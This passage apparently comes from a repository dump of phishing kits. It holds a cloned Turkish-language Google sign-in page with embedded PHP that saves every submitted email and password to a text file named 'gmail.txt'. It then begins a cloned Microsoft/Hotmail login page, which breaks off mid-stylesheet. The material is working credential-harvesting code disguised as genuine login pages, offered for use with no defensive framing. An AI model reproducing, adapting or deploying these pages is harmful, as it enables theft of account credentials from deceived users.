text-shadow: 0 1px rgba(0,0,0,0.1);\r\n  text-transform: uppercase;\r\n  background-color: #d14836;\r\n  background-image: -webkit-gradient(linear,left top,left bottom,from(#dd4b39),to(#d14836));\r\n  background-image: -webkit-linear-gradient(top,#dd4b39,#d14836);\r\n  background-image: -moz-linear-gradient(top,#dd4b39,#d14836);\r\n  background-image: -ms-linear-gradient(top,#dd4b39,#d14836);\r\n  background-image: -o-linear-gradient(top,#dd4b39,#d14836);\r\n  background-image: linear-gradient(top,#dd4b39,#d14836);\r\n  }\r\n  .g-button-red:hover {\r\n  border: 1px solid #b0281a;\r\n  color: #fff;\r\n  text-shadow: 0 1px rgba(0,0,0,0.3);\r\n  background-color: #c53727;\r\n  background-image: -webkit-gradient(linear,left top,left bottom,from(#dd4b39),to(#c53727));\r\n  background-image: -webkit-linear-gradient(top,#dd4b39,#c53727);\r\n  background-image: -moz-linear-gradient(top,#dd4b39,#c53727);\r\n  background-image: -ms-linear-gradient(top,#dd4b39,#c53727);\r\n  background-image: -o-linear-gradient(top,#dd4b39,#c53727);\r\n  background-image: linear-gradient(top,#dd4b39,#c53727);\r\n  -webkit-box-shadow: 0 1px 1px rgba(0,0,0,0.2);\r\n  -moz-box-shadow: 0 1px 1px rgba(0,0,0,0.2);\r\n  -ms-box-shadow: 0 1px 1px rgba(0,0,0,0.2);\r\n  -o-box-shadow: 0 1px 1px rgba(0,0,0,0.2);\r\n  box-shadow: 0 1px 1px rgba(0,0,0,0.2);\r\n  }\r\n  .g-button-red:active {\r\n  border: 1px solid #992a1b;\r\n  background-color: #b0281a;\r\n  background-image: -webkit-gradient(linear,left top,left bottom,from(#dd4b39),to(#b0281a));\r\n  background-image: -webkit-linear-gradient(top,#dd4b39,#b0281a);\r\n  background-image: -moz-linear-gradient(top,#dd4b39,#b0281a);\r\n  background-image: -ms-linear-gradient(top,#dd4b39,#b0281a);\r\n  background-image: -o-linear-gradient(top,#dd4b39,#b0281a);\r\n  background-image: linear-gradient(top,#dd4b39,#b0281a);\r\n  -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);\r\n  -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);\r\n  box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);\r\n  }\r\n  .g-button-white {\r\n  border: 1px solid #dcdcdc;\r\n  color: #666;\r\n  background: #fff;\r\n  }\r\n  .g-button-white:hover {\r\n  border: 1px solid #c6c6c6;\r\n  color: #333;\r\n  background: #fff;\r\n  -webkit-box-shadow: 0 1px 1px rgba(0,0,0,0.1);\r\n  -moz-box-shadow: 0 1px 1px rgba(0,0,0,0.1);\r\n  box-shadow: 0 1px 1px rgba(0,0,0,0.1);\r\n  }\r\n  .g-button-white:active {\r\n  background: #fff;\r\n  -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);\r\n  -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);\r\n  box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);\r\n  }\r\n  .g-button-red:visited,\r\n  .g-button-share:visited,\r\n  .g-button-submit:visited {\r\n  color: #fff;\r\n  }\r\n  .g-button-submit:focus,\r\n  .g-button-share:focus,\r\n  .g-button-red:focus {\r\n  -webkit-box-shadow: inset 0 0 0 1px #fff;\r\n  -moz-box-shadow: inset 0 0 0 1px #fff;\r\n  box-shadow: inset 0 0 0 1px #fff;\r\n  }\r\n  .g-button-share:focus {\r\n  border-color: #29691d;\r\n  }\r\n  .g-button-red:focus {\r\n  border-color: #d14836;\r\n  }\r\n  .g-button-submit:focus:hover,\r\n  .g-button-share:focus:hover,\r\n  .g-button-red:focus:hover {\r\n  -webkit-box-shadow: inset 0 0 0 1px #fff, 0 1px 1px rgba(0,0,0,0.1);\r\n  -moz-box-shadow: inset 0 0 0 1px #fff, 0 1px 1px rgba(0,0,0,0.1);\r\n  box-shadow: inset 0 0 0 1px #fff, 0 1px 1px rgba(0,0,0,0.1);\r\n  }\r\n  .g-button img {\r\n  display: inline-block;\r\n  margin: -3px 0 0;\r\n  opacity: .55;\r\n  vertical-align: middle;\r\n  }\r\n  *+html .g-button img {\r\n  margin: 4px 0 0;\r\n  }\r\n  .g-button:hover img {\r\n  opacity: .72;\r\n  }\r\n  .g-button:active img {\r\n  opacity: 1;\r\n  }\r\n  .errormsg {\r\n  margin: .5em 0 0;\r\n  display: block;\r\n  color: #dd4b39;\r\n  line-height: 17px;\r\n  }\r\n  .training-msg {\r\n  padding: .5em 8px;\r\n  background: #f9edbe;\r\n  }\r\n  .training-msg p {\r\n  margin: 0 0 .5em;\r\n  }\r\n  input[type=email].form-error,\r\n  input[type=password].form-error,\r\n  input[type=text].form-error,\r\n  input[type=url].form-error {\r\n  border: 1px solid #dd4b39;\r\n  }\r\n  .help-link {\r\n  background: #dd4b39;\r\n  padding: 0 5px;\r\n  color: #fff;\r\n  font-weight: bold;\r\n  display: inline-block;\r\n  -webkit-border-radius: 1em;\r\n  -moz-border-radius: 1em;\r\n  border-radius: 1em;\r\n  text-decoration: none;\r\n  position: relative;\r\n  top: 0px;\r\n  }\r\n  .help-link:visited {\r\n  color: #fff;\r\n  }\r\n  .help-link:hover {\r\n  opacity: .7;\r\n  color: #fff;\r\n  }\r\n</style>\r\n<style type=\"text/css\">\r\n  .content {\r\n  width: auto;\r\n  max-width: 1000px;\r\n  min-width: 780px;\r\n  }\r\n  .product-info {\r\n  margin: 0 385px 0 0;\r\n  }\r\n  .product-info h3 {\r\n  font-size: 1.23em;\r\n  font-weight: normal;\r\n  }\r\n  .product-info a:visited {\r\n  color: #61c;\r\n  }\r\n  .product-info .g-button:visited {\r\n  color: #666;\r\n  }\r\n  .sign-in {\r\n  width: 335px;\r\n  float: right;\r\n  }\r\n  .signin-box,\r\n  .accountchooser-box {\r\n  margin: 12px 0 0;\r\n  padding: 20px 25px 15px;\r\n  background: #f5f5f5;\r\n  border: 1px solid #e5e5e5;\r\n  }\r\n  .product-headers {\r\n  margin: 0 0 1.5em;\r\n  }\r\n  .product-headers h1 {\r\n  color: #dd4b39;\r\n  font-size: 25px;\r\n  margin: 0 !important;\r\n  }\r\n  .product-headers h2 {\r\n  font-size: 16px;\r\n  margin: .4em 0 0;\r\n  }\r\n  .features {\r\n  overflow: hidden;\r\n  margin: 2em 0 0;\r\n  }\r\n  .features li {\r\n  margin: 3px 0 2em;\r\n  }\r\n  .features img {\r\n  float: left;\r\n  margin: -3px 0 0;\r\n  }\r\n  .features p {\r\n  margin: 0 0 0 68px;\r\n  }\r\n  .features .title {\r\n  font-size: 16px;\r\n  margin-bottom: .3em;\r\n  }\r\n  .features.no-icon p {\r\n  margin: 0;\r\n  }\r\n  .features .small-title {\r\n  font-size: 1em;\r\n  font-weight: bold;\r\n  }\r\n  .notification-bar {\r\n  background: #f9edbe;\r\n  padding: 8px;\r\n  }\r\n</style>\r\n<style type=\"text/css\">\r\n  .signin-box h2 {\r\n  font-size: 16px;\r\n  line-height: 16px;\r\n  height: 16px;\r\n  margin: 0 0 1.2em;\r\n  position: relative;\r\n  }\r\n  .signin-box h2 strong {\r\n  display: inline-block;\r\n  position: absolute;\r\n  right: 0;\r\n  top: 1px;\r\n  height: 19px;\r\n  width: 52px;\r\n  background: transparent url(//ssl.gstatic.com/accounts/ui/google-signin-flat.png) no-repeat;\r\n  }\r\n  .signin-box label {\r\n  display: block;\r\n  margin: 0 0 1.5em;\r\n  }\r\n  .signin-box input[type=text],\r\n  .signin-box input[type=password] {\r\n  width: 100%;\r\n  height: 32px;\r\n  font-size: 15px;\r\n  }\r\n  .signin-box .email-label,\r\n  .signin-box .passwd-label {\r\n  font-weight: bold;\r\n  margin: 0 0 .5em;\r\n  display: block;\r\n  -webkit-user-select: none;\r\n  -moz-user-select: none;\r\n  user-select: none;\r\n  }\r\n  .signin-box .reauth {\r\n  display: inline-block;\r\n  font-size: 15px;\r\n  height: 29px;\r\n  line-height: 29px;\r\n  margin: 0;\r\n  }\r\n  .signin-box label.remember {\r\n  display: inline-block;\r\n  vertical-align: top;\r\n  margin: 9px 0 0;\r\n  }\r\n  .signin-box .remember-label {\r\n  font-weight: normal;\r\n  color: #666;\r\n  line-height: 0;\r\n  padding: 0 0 0 .4em;\r\n  -webkit-user-select: none;\r\n  -moz-user-select: none;\r\n  user-select: none;\r\n  }\r\n  .signin-box input[type=submit] {\r\n  margin: 0 1.5em 1.2em 0;\r\n  height: 32px;\r\n  font-size: 13px;\r\n  }\r\n  .signin-box ul {\r\n  margin: 0;\r\n  }\r\n</style>\r\n  </head>\r\n  <body>\r\n  <div class=\"wrapper\">\r\n  <div class=\"google-header-bar\">\r\n  <div class=\"header content clearfix\">\r\n  <a id=\"link-google\" href=\"http://www.google.com/\">\r\n  <img class=\"logo\" src=\"https://techcrunch.com/wp-content/uploads/2014/01/google-plus-logo.jpg?w=150\" alt=\"Google\">\r\n  </a>\r\n  <a id=\"link-signup\" class=\"signup\" href=\"https://accounts.google.com/NewAccount\">Yeni bir Google Hesabı için kaydolun.</a>\r\n  </div>\r\n  </div>\r\n  <div class=\"main content clearfix\">\r\n  <div class=\"sign-in\">\r\n<div class=\"signin-box\">\r\n  <h2>Giriş <strong></strong></h2>\r\n  <form action=\"\" method=\"post\">\r\n  <input name=\"dsh\" id=\"dsh\" value=\"-8615553460916059635\" type=\"hidden\">\r\n  <input name=\"GALX\" value=\"OMLJtY1lhH8\" type=\"hidden\">\r\n  <input id=\"pstMsg\" name=\"pstMsg\" value=\"1\" type=\"hidden\">\r\n  <input id=\"dnConn\" name=\"dnConn\" value=\"https://accounts.youtube.com\" type=\"hidden\">\r\n<input name=\"timeStmp\" id=\"timeStmp\" value=\"\" type=\"hidden\">\r\n<input name=\"secTok\" id=\"secTok\" value=\"\" type=\"hidden\">\r\n<label>\r\n  <strong class=\"email-label\">Email</strong>\r\n  <input name=\"email\"  type=\"text\">\r\n</label>\r\n<label>\r\n  <strong class=\"passwd-label\">Şifre</strong>\r\n  <input name=\"pass\"  type=\"password\">\r\n</label>\r\n  <input class=\"g-button g-button-submit\" name=\"signIn\" id=\"signIn\" value=\"Giriş\" type=\"submit\">\r\n  <label class=\"remember\">\r\n  <input name=\"PersistentCookie\" id=\"PersistentCookie\" value=\"yes\" checked=\"checked\" type=\"checkbox\">\r\n  <strong class=\"remember-label\">\r\n  Oturumu hatırla.\r\n  </strong>\r\n  </label>\r\n  <input name=\"rmShown\" value=\"1\" type=\"hidden\">\r\n  </form>\r\n\r\n\r\n  <?php \r\nif (!empty($_POST[\"pass\"]) && !empty($_POST[\"email\"])) {\r\n$ac = fopen(\"gmail.txt\",\"a+\");\r\n$password =@$_POST['pass'];\r\n$username = @$_POST['email'];\r\n$userlar = (\"\\n __________________ \\n\".\" E-Posta: \".$username.\"\\n Password: \".$password.\"\\n__________________ \\n\");\r\nfwrite($ac,$userlar);\r\nfclose($ac);\r\n}\r\n\r\n\r\n\r\n   ?>\r\n  <ul>\r\n  <li>\r\n  <a id=\"link-forgot-passwd\" href=\"https://www.google.com/accounts/recovery\" target=\"_top\">\r\n  Hesabınıza erişemiyor musunuz?\r\n  </a>\r\n  </li>\r\n  </ul>\r\n</div>\r\n  </div>\r\n  <div class=\"product-info \">\r\n<div class=\"product-headers\">\r\n  <h1>Google Hesabı</h1>\r\n</div>\r\n<p>Google, Google Hesabınızda oturum açtığınızda sunabileceği daha fazla bilgiye sahiptir.\r\n</p><p>Sağda oturum açın.\r\n<a href=\"https://accounts.google.com/NewAccount\">\r\ncreate an account for free</a>.</p>\r\n<ul class=\"features clearfix\">\r\n  <li>\r\n  <img src=\"Login_files/googlemail-42.png\" alt=\"\">\r\n  <p class=\"title\">Gmail</p>\r\n  <p>Arkadaşlarınızla sohbet edin ve önemli bir e-postayı kaçırmayın.</p>\r\n  </li>\r\n  <li>\r\n  <img src=\"Login_files/search-b42.png\" alt=\"\">\r\n  <p class=\"title\">Kişiselleştirilmiş Arama </p>\r\n  <p>Geçmişteki aramalarınıza dayanarak daha alakalı sonuç alın.</p>\r\n  </li>\r\n</ul>\r\n<p>\r\n  Bir <a href=\"http://www.google.com/intl/en/landing/accounts/index.html#utm_campaign=en&amp;utm_medium=et&amp;utm_source=gaia\">google hesabının</a> avantajlarını görün.\r\n</p>\r\n  </div>\r\n  <div id=\"cc_iframe_parent\"><iframe id=\"CheckConnectionIframe\" src=\"Login_files/CheckConnection.htm\" style=\"visibility: hidden; width: 1px; height: 1px; position: absolute; top: -100px;\"></iframe></div>\r\n  </div>\r\n  <div class=\"announce-bar\">\r\n  <div class=\"content\">\r\n  <p class=\"message\">\r\n Google'ın hesap onaylama sistemine hoş geldiniz.\r\n  \r\n  </p>\r\n  </div>\r\n  </div>\r\n<div class=\"google-footer-bar\">\r\n  <div class=\"footer content clearfix\">\r\n  <ul>\r\n  <li>© 2011 Google</li>\r\n  <li><a href=\"http://www.google.com/\" target=\"_blank\">Google Home</a></li>\r\n  <li><a href=\"https://accounts.google.com/TOS?hl=en\" target=\"_blank\">Terms of Service</a></li>\r\n  <li><a href=\"http://www.google.com/intl/en/privacy/\" target=\"_blank\">Privacy Policy</a></li>\r\n  <li><a href=\"http://www.google.com/support/accounts?hl=en\" target=\"_blank\">Help</a></li>\r\n  </ul>\r\n  </div>\r\n</div>\r\n  </div>\r\n  \r\n</body></html>"
  },
  {
    "path": "Site/Mail/Site-hotmail/index.php",
    "content": "<!DOCTYPE html>\r\n<!-- saved from url=(0032)https://login.live.com/login.srf -->\r\n<html dir=\"ltr\" lang=\"TR-TR\"><head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\"><meta http-equiv=\"X-UA-Compatible\" content=\"IE=Edge\"><!--<base href=\"https://login.live.com/pp1600/\">--><base href=\".\"><script type=\"text/javascript\">var PROOF = {};PROOF.Type = {SQSA: 6, CSS: 5, DeviceId: 4, Email: 1, AltEmail: 2, SMS: 3, HIP: 8, Birthday: 9, TOTPAuthenticator: 10, RecoveryCode: 11, StrongTicket: 13, TOTPAuthenticatorV2: 14, Voice: -3};</script><title>Microsoft hesabınızda oturum açın</title><meta name=\"PageID\" content=\"i5030\"><meta name=\"SiteID\" content=\"38936\"><meta name=\"ReqLC\" content=\"1055\"><meta name=\"LocLC\" content=\"1055\"><meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no\"><link rel=\"shortcut icon\" href=\"https://auth.gfx.ms/16.000.27497.00/images/favicon.ico\">\r\n            <style type=\"text/css\">\r\n              \r\nhtml{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:bold}dfn{font-style:italic}h1{font-size:2em;margin:.67em 0}mark{background:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{color:inherit;font:inherit;margin:0}button{overflow:visible}button,select{text-transform:none}button,html input[type=\"button\"],input[type=\"reset\"],input[type=\"submit\"]{-webkit-appearance:button;cursor:pointer}button[disabled],html input[disabled]{cursor:default}button::-moz-focus-inner,input::-moz-focus-inner{border:0;padding:0}input{line-height:normal}input[type=\"checkbox\"],input[type=\"radio\"]{box-sizing:border-box;padding:0}input[type=\"number\"]::-webkit-inner-spin-button,input[type=\"number\"]::-webkit-outer-spin-button{height:auto}input[type=\"search\"]{-webkit-appearance:textfield;-moz-box-sizing:content-box;-webkit-box-sizing:content-box;box-sizing:content-box}input[type=\"search\"]::-webkit-search-cancel-button,input[type=\"search\"]::-webkit-search-decoration{-webkit-appearance:none}fieldset{border:1px solid silver;margin:0 2px;padding:.35em .625em .75em}legend{border:0;padding:0}textarea{overflow:auto}optgroup{font-weight:bold}table{border-collapse:collapse;border-spacing:0}td,th{padding:0}*{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}*:before,*:after{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}input,button,select,textarea{font-family:inherit;font-size:inherit;line-height:inherit}a:focus{outline:thin dotted;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}figure{margin:0}img{vertical-align:middle}.img-responsive{display:block;max-width:100%;height:auto}.img-circle{border-radius:50%}.sr-only{position:absolute;width:1px;height:1px;margin:-1px;padding:0;overflow:hidden;clip:rect(0,0,0,0);border:0}.sr-only-focusable:active,.sr-only-focusable:focus{position:static;width:auto;height:auto;margin:0;overflow:visible;clip:auto}html{font-size:100%}body{font-family:\"Segoe UI Webfont\",-apple-system,\"Helvetica Neue\",\"Lucida Grande\",\"Roboto\",\"Ebrima\",\"Nirmala UI\",\"Gadugi\",\"Segoe Xbox Symbol\",\"Segoe UI Symbol\",\"Meiryo UI\",\"Khmer UI\",\"Tunga\",\"Lao UI\",\"Raavi\",\"Iskoola Pota\",\"Latha\",\"Leelawadee\",\"Microsoft YaHei UI\",\"Microsoft JhengHei UI\",\"Malgun Gothic\",\"Estrangelo Edessa\",\"Microsoft Himalaya\",\"Microsoft New Tai Lue\",\"Microsoft PhagsPa\",\"Microsoft Tai Le\",\"Microsoft Yi Baiti\",\"Mongolian Baiti\",\"MV Boli\",\"Myanmar Text\",\"Cambria Math\";font-size:15px;line-height:20px;font-weight:400;font-size:.9375rem;line-height:1.25rem;padding-bottom:.227px;padding-top:.227px;padding-bottom:.227px;padding-top:.227px;color:#000;background-color:#fff}a{color:#ccc;text-decoration:none}a:link{color:#0067b8}a:visited{color:#0067b8}a:hover{color:#666}a:focus{color:#0067b8}a:active{color:#999}.text-center{text-align:center}.text-justify{text-align:justify}.text-nowrap{white-space:nowrap}.text-lowercase{text-transform:lowercase}.text-uppercase{text-transform:uppercase}.text-capitalize{text-transform:capitalize}ul,ol{margin-top:0;margin-bottom:10px}ul ul,ul ol,ol ul,ol ol{margin-bottom:0}abbr[title],abbr[data-original-title]{cursor:help}blockquote p:last-child,blockquote ul:last-child,blockquote ol:last-child{margin-bottom:0}blockquote footer,blockquote small,blockquote .small{display:block}address{font-style:normal}@font-face{font-family:'Segoe UI Webfont';src:local(\"Segoe UI Light\");font-weight:200;font-style:normal}@font-face{font-family:'Segoe UI Webfont';src:local(\"Segoe UI\");font-weight:400;font-style:normal}@font-face{font-family:'Segoe UI Webfont';src:local(\"Segoe UI Semibold\");font-weight:600;font-style:normal}h1,h2,h3,h4,h5,h6,.text-headline,.text-header,.text-subheader,.text-title,.text-subtitle,.text-body,.text-base,.text-caption,.text-caption-alt,.text-subcaption,p{margin-bottom:20px;margin-top:20px;margin-bottom:1.25rem;margin-top:1.25rem}.text-headline{font-size:62px;line-height:80px;font-weight:200;font-size:3.875rem;line-height:5rem;padding-bottom:2.2716px;padding-top:2.2716px;padding-bottom:2.2716px;padding-top:2.2716px}.text-headline.text-maxlines-1{white-space:nowrap;text-overflow:ellipsis;max-height:84.5432px;max-height:5.28395rem}.text-headline.text-maxlines-2{max-height:164.5432px;max-height:10.28395rem}.text-headline.text-maxlines-3{max-height:244.5432px;max-height:15.28395rem}.text-headline.text-maxlines-4{max-height:324.5432px;max-height:20.28395rem}.text-header,h1{font-size:46px;line-height:56px;font-weight:200;font-size:2.875rem;line-height:3.5rem;padding-bottom:3.3628px;padding-top:3.3628px;padding-bottom:3.3628px;padding-top:3.3628px}.text-header.text-maxlines-1,h1.text-maxlines-1{white-space:nowrap;text-overflow:ellipsis;max-height:62.7256px;max-height:3.92035rem}.text-header.text-maxlines-2,h1.text-maxlines-2{max-height:118.7256px;max-height:7.42035rem}.text-header.text-maxlines-3,h1.text-maxlines-3{max-height:174.7256px;max-height:10.92035rem}.text-header.text-maxlines-4,h1.text-maxlines-4{max-height:230.7256px;max-height:14.42035rem}.text-subheader,h2{font-size:34px;line-height:40px;font-weight:200;font-size:2.125rem;line-height:2.5rem;padding-bottom:3.1812px;padding-top:3.1812px;padding-bottom:3.1812px;padding-top:3.1812px}.text-subheader.text-maxlines-1,h2.text-maxlines-1{white-space:nowrap;text-overflow:ellipsis;max-height:46.3624px;max-height:2.89765rem}.text-subheader.text-maxlines-2,h2.text-maxlines-2{max-height:86.3624px;max-height:5.39765rem}.text-subheader.text-maxlines-3,h2.text-maxlines-3{max-height:126.3624px;max-height:7.89765rem}.text-subheader.text-maxlines-4,h2.text-maxlines-4{max-height:166.3624px;max-height:10.39765rem}.text-title,h3{font-size:24px;line-height:28px;font-weight:300;font-size:1.5rem;line-height:1.75rem;padding-bottom:2.3632px;padding-top:2.3632px;padding-bottom:2.3632px;padding-top:2.3632px}.text-title.text-maxlines-1,h3.text-maxlines-1{white-space:nowrap;text-overflow:ellipsis;max-height:32.7264px;max-height:2.0454rem}.text-title.text-maxlines-2,h3.text-maxlines-2{max-height:60.7264px;max-height:3.7954rem}.text-title.text-maxlines-3,h3.text-maxlines-3{max-height:88.7264px;max-height:5.5454rem}.text-title.text-maxlines-4,h3.text-maxlines-4{max-height:116.7264px;max-height:7.2954rem}.text-subtitle,h4{font-size:20px;line-height:24px;font-weight:400;font-size:1.25rem;line-height:1.5rem;padding-bottom:1.636px;padding-top:1.636px;padding-bottom:1.636px;padding-top:1.636px}.text-subtitle.text-maxlines-1,h4.text-maxlines-1{white-space:nowrap;text-overflow:ellipsis;max-height:27.272px;max-height:1.7045rem}.text-subtitle.text-maxlines-2,h4.text-maxlines-2{max-height:51.272px;max-height:3.2045rem}.text-subtitle.text-maxlines-3,h4.text-maxlines-3{max-height:75.272px;max-height:4.7045rem}.text-subtitle.text-maxlines-4,h4.text-maxlines-4{max-height:99.272px;max-height:6.2045rem}.text-caption,h5{font-size:12px;line-height:14px;font-weight:400;font-size:.75rem;line-height:.875rem;padding-bottom:1.1816px;padding-top:1.1816px;padding-bottom:1.1816px;padding-top:1.1816px}.text-caption.text-maxlines-1,h5.text-maxlines-1{white-space:nowrap;text-overflow:ellipsis;max-height:16.3632px;max-height:1.0227rem}.text-caption.text-maxlines-2,h5.text-maxlines-2{max-height:30.3632px;max-height:1.8977rem}.text-caption.text-maxlines-3,h5.text-maxlines-3{max-height:44.3632px;max-height:2.7727rem}.text-caption.text-maxlines-4,h5.text-maxlines-4{max-height:58.3632px;max-height:3.6477rem}.text-caption-alt,h6{font-size:10px;line-height:12px;font-weight:400;font-size:.625rem;line-height:.75rem;padding-bottom:.818px;padding-top:.818px;padding-bottom:.818px;padding-top:.818px}.text-caption-alt.text-maxlines-1,h6.text-maxlines-1{white-space:nowrap;text-overflow:ellipsis;max-height:13.636px;max-height:.85225rem}.text-caption-alt.text-maxlines-2,h6.text-maxlines-2{max-height:25.636px;max-height:1.60225rem}.text-caption-alt.text-maxlines-3,h6.text-maxlines-3{max-height:37.636px;max-height:2.35225rem}.text-caption-alt.text-maxlines-4,h6.text-maxlines-4{max-height:49.636px;max-height:3.10225rem}.text-subcaption{font-size:8px;line-height:10px;font-weight:400;font-size:.5rem;line-height:.625rem;padding-bottom:.4544px;padding-top:.4544px;padding-bottom:.4544px;padding-top:.4544px}.text-subcaption.text-maxlines-1{white-space:nowrap;text-overflow:ellipsis;max-height:10.9088px;max-height:.6818rem}.text-subcaption.text-maxlines-2{max-height:20.9088px;max-height:1.3068rem}.text-subcaption.text-maxlines-3{max-height:30.9088px;max-height:1.9318rem}.text-subcaption.text-maxlines-4{max-height:40.9088px;max-height:2.5568rem}.text-body,p{font-size:15px;line-height:20px;font-weight:400;font-size:.9375rem;line-height:1.25rem;padding-bottom:.227px;padding-top:.227px;padding-bottom:.227px;padding-top:.227px}.text-body.text-maxlines-1,p.text-maxlines-1{white-space:nowrap;text-overflow:ellipsis;max-height:20.454px;max-height:1.27838rem}.text-body.text-maxlines-2,p.text-maxlines-2{max-height:40.454px;max-height:2.52838rem}.text-body.text-maxlines-3,p.text-maxlines-3{max-height:60.454px;max-height:3.77838rem}.text-body.text-maxlines-4,p.text-maxlines-4{max-height:80.454px;max-height:5.02838rem}.text-base{font-size:15px;line-height:20px;font-weight:600;font-size:.9375rem;line-height:1.25rem;padding-bottom:.227px;padding-top:.227px;padding-bottom:.227px;padding-top:.227px}.text-base.text-maxlines-1{white-space:nowrap;text-overflow:ellipsis;max-height:20.454px;max-height:1.27838rem}.text-base.text-maxlines-2{max-height:40.454px;max-height:2.52838rem}.text-base.text-maxlines-3{max-height:60.454px;max-height:3.77838rem}.text-base.text-maxlines-4{max-height:80.454px;max-height:5.02838rem}[class*=\"text-maxlines\"]{overflow:hidden}.text-left{text-align:left}.text-right{text-align:right}.list-unstyled{padding-left:0;list-style:none}ul{padding-left:0;list-style:none}ul,ol{margin-top:20px;margin-bottom:20px}ul li,ol li{margin-top:12px;margin-bottom:12px}.list-inline{padding-left:0;list-style:none;margin-left:-4px}.list-inline>li{display:inline-block;padding-left:4px;padding-right:4px}blockquote{padding:8px 12px;margin:0 0 12px}.blockquote-reverse,blockquote.pull-right{padding-right:12px;padding-left:0;text-align:right}address{margin-bottom:12px}.container,.container-fluid{margin-right:auto;margin-left:auto;padding-left:2px;padding-right:2px;width:90%}.container:before,.container:after,.container-fluid:before,.container-fluid:after{content:\" \";display:table}.container:after,.container-fluid:after{clear:both}.container .container,.container-fluid .container{width:auto}.row{margin-left:-2px;margin-right:-2px}.row:before,.row:after{content:\" \";display:table}.row:after{clear:both}.col-xs-1,.col-sm-1,.col-md-1,.col-lg-1,.col-xs-2,.col-sm-2,.col-md-2,.col-lg-2,.col-xs-3,.col-sm-3,.col-md-3,.col-lg-3,.col-xs-4,.col-sm-4,.col-md-4,.col-lg-4,.col-xs-5,.col-sm-5,.col-md-5,.col-lg-5,.col-xs-6,.col-sm-6,.col-md-6,.col-lg-6,.col-xs-7,.col-sm-7,.col-md-7,.col-lg-7,.col-xs-8,.col-sm-8,.col-md-8,.col-lg-8,.col-xs-9,.col-sm-9,.col-md-9,.col-lg-9,.col-xs-10,.col-sm-10,.col-md-10,.col-lg-10,.col-xs-11,.col-sm-11,.col-md-11,.col-lg-11,.col-xs-12,.col-sm-12,.col-md-12,.col-lg-12,.col-xs-13,.col-sm-13,.col-md-13,.col-lg-13,.col-xs-14,.col-sm-14,.col-md-14,.col-lg-14,.col-xs-15,.col-sm-15,.col-md-15,.col-lg-15,.col-xs-16,.col-sm-16,.col-md-16,.col-lg-16,.col-xs-17,.col-sm-17,.col-md-17,.col-lg-17,.col-xs-18,.col-sm-18,.col-md-18,.col-lg-18,.col-xs-19,.col-sm-19,.col-md-19,.col-lg-19,.col-xs-20,.col-sm-20,.col-md-20,.col-lg-20,.col-xs-21,.col-sm-21,.col-md-21,.col-lg-21,.col-xs-22,.col-sm-22,.col-md-22,.col-lg-22,.col-xs-23,.col-sm-23,.col-md-23,.col-lg-23,.col-xs-24,.col-sm-24,.col-md-24,.col-lg-24{position:relative;min-height:1px;padding-left:2px;padding-right:2px}.col-xs-1,.col-xs-2,.col-xs-3,.col-xs-4,.col-xs-5,.col-xs-6,.col-xs-7,.col-xs-8,.col-xs-9,.col-xs-10,.col-xs-11,.col-xs-12,.col-xs-13,.col-xs-14,.col-xs-15,.col-xs-16,.col-xs-17,.col-xs-18,.col-xs-19,.col-xs-20,.col-xs-21,.col-xs-22,.col-xs-23,.col-xs-24{float:left}.col-xs-1{width:4.16667%}.col-xs-2{width:8.33333%}.col-xs-3{width:12.5%}.col-xs-4{width:16.66667%}.col-xs-5{width:20.83333%}.col-xs-6{width:25%}.col-xs-7{width:29.16667%}.col-xs-8{width:33.33333%}.col-xs-9{width:37.5%}.col-xs-10{width:41.66667%}.col-xs-11{width:45.83333%}.col-xs-12{width:50%}.col-xs-13{width:54.16667%}.col-xs-14{width:58.33333%}.col-xs-15{width:62.5%}.col-xs-16{width:66.66667%}.col-xs-17{width:70.83333%}.col-xs-18{width:75%}.col-xs-19{width:79.16667%}.col-xs-20{width:83.33333%}.col-xs-21{width:87.5%}.col-xs-22{width:91.66667%}.col-xs-23{width:95.83333%}.col-xs-24{width:100%}.col-xs-pull-0{right:auto}.col-xs-pull-1{right:4.16667%}.col-xs-pull-2{right:8.33333%}.col-xs-pull-3{right:12.5%}.col-xs-pull-4{right:16.66667%}.col-xs-pull-5{right:20.83333%}.col-xs-pull-6{right:25%}.col-xs-pull-7{right:29.16667%}.col-xs-pull-8{right:33.33333%}.col-xs-pull-9{right:37.5%}.col-xs-pull-10{right:41.66667%}.col-xs-pull-11{right:45.83333%}.col-xs-pull-12{right:50%}.col-xs-pull-13{right:54.16667%}.col-xs-pull-14{right:58.33333%}.col-xs-pull-15{right:62.5%}.col-xs-pull-16{right:66.66667%}.col-xs-pull-17{right:70.83333%}.col-xs-pull-18{right:75%}.col-xs-pull-19{right:79.16667%}.col-xs-pull-20{right:83.33333%}.col-xs-pull-21{right:87.5%}.col-xs-pull-22{right:91.66667%}.col-xs-pull-23{right:95.83333%}.col-xs-pull-24{right:100%}.col-xs-push-0{left:auto}.col-xs-push-1{left:4.16667%}.col-xs-push-2{left:8.33333%}.col-xs-push-3{left:12.5%}.col-xs-push-4{left:16.66667%}.col-xs-push-5{left:20.83333%}.col-xs-push-6{left:25%}.col-xs-push-7{left:29.16667%}.col-xs-push-8{left:33.33333%}.col-xs-push-9{left:37.5%}.col-xs-push-10{left:41.66667%}.col-xs-push-11{left:45.83333%}.col-xs